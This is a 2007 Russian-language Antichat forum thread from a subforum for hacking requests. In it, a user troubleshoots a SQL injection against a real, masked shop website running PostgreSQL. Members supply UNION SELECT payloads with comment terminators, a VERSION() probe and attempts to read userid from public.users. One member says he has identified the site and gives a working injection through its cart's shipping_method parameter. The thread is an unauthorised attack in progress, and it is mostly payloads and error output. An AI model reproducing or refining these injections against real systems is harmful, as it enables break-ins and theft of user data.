ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

MySQL ERROR
  #1  
Старый 04.09.2007, 12:15
Аватар для zjuk@
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию MySQL ERROR

Господа сталкнулся с проблемой ввожу такую строку
http://ххххххххх/index.da?ln=ххххх=-1 UNION SELECT null,null,null,null,null,null,null,null from public.users

Браузер выдаёт такую строку:
ERROR: relation "cur" does not exist
откуда этот CUR и как его побороть.
Помогите советом, совсем замучился уже.
Пасиба.
 

  #2  
Старый 04.09.2007, 12:22
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

хм... а с чего ты взял, что это MySQL это Postgre как я понимаю...

и вобще че сюда то постишь
__________________
Карфаген должен быть разрушен...
 

  #3  
Старый 04.09.2007, 12:32
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Scipio, не факт. Это может быть что угодно.

zjuk@, во-первых ты определись с версией, а во-вторых напиши запрос по нормальному... Я там не вижу отсечение оригинального запроса, и не вижу нормальной инъекции в переменную... Ты можешь вырезать хост из УРЛЫ если это протеворечит твоим религиозным взглядам, но будь добр оставить URI с инжектируемым запросом 1:1 как ты это пишешь в браузере, иначе гадать можно до вечера...
 

  #4  
Старый 04.09.2007, 13:58
Аватар для zjuk@
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

groundhog

да не вопрос, вот полная строка тока без урла http://ххххх.уу/index.da?ln=est&mid= -1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users

Насчёт версии MySql определить не удалсоь, всё что известно вот:
Apache/2.0.52 (Gentoo/Linux) PHP/5.0.3
Last-Modified=Tue, 07 Mar 2006

причём все стандартные ошибки, например: column X not exist, schema Х not exist система выдаёт без проблем, однако походу как только все поля вернно определны, то возникает злощастная relation "cur" does not exist, чтоб её...
 

  #5  
Старый 04.09.2007, 14:38
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Полный код ошибки в студию...
 

  #6  
Старый 04.09.2007, 14:51
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Ну опять же, комент может и не нужен, но лучше поставить:

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users/*

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users+--+

Попробуй не -1 а 99999

http://ххххх.уу/index.da?ln=est&mid=99999+UNION+SELECT+null,userid ,null,null,null,null,nul l,null+from+public.users/*

И что тебе мешает посмотреть версию?

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,VERSION(),null,null,null,null, nul l,null+from+public.users/*

И зачем ты лезешь в какую-то схему public? Твой пользователь работает в рамках своей схемы и 99 шансов из 100 что у него нету доступа в схемы других пользователей...

З.Ы. Послушай Кэша, напиши полную ошибку которую он выводит.
 

  #7  
Старый 04.09.2007, 15:36
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

postgreы это

и гугл думает вот что http://www.google.com/search?rls=en&q=relation+does+not+exist

и если коротко, то дело в расстановке ковычек, коментария и таблица.столбец

select * from "X"."Y"
 

  #8  
Старый 04.09.2007, 15:40
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

В Постгрес, идентификаторы употребляются в кавычках, когда они содержат пробел, или имеют регитрозависимое описание... Имхо, проблема не в этом.
 

  #9  
Старый 04.09.2007, 15:47
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Вроде как я вычислил этот сайт. Попробуй так, только вначале надо зарегистрироваться, что то купить зайти в корзину и в количестве нажать + http://xxxxxxxxx/index.da?ln=rus&do=my_cart&shipping_method=-10%20union%20select%201111,2222333--
Выводиться описание товара, а рядом с полем метод доставки вывод (у меня 2222333).
Пробуй
 

  #10  
Старый 04.09.2007, 16:48
Аватар для zjuk@
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

Спасибо за ответы.
Вывожу полный список ошибок. прикол в том, что помимо белого окна браузера и короткой строки ошибки больше ничего не выходит.

groundhog
всё тобой перечисленное, мною до этого перепробованно много раз и забито, потому что:

http://xxxxxx/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users/*
ERROR: unterminated /* comment at or near "/* ORDER BY cur.jrk ASC " at character 431

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users+--+
ERROR: relation "cur" does not exist

если 9999, то:
ERROR: relation "cur" does not exist

VERSION() не катит, потому что
ERROR: UNION types bigint and text cannot be matched

Elekt
при попытке поставить что-либо в ковычках, даже в хтмл формате жёстко матириться, в каком бы месте я их не ставил:
ERROR: syntax error at or near "\" at character ххх

Red_Red1
твой вариант в разроботке, пока...
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ZBrute Zadoxlik ICQ 322 20.04.2010 13:03
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ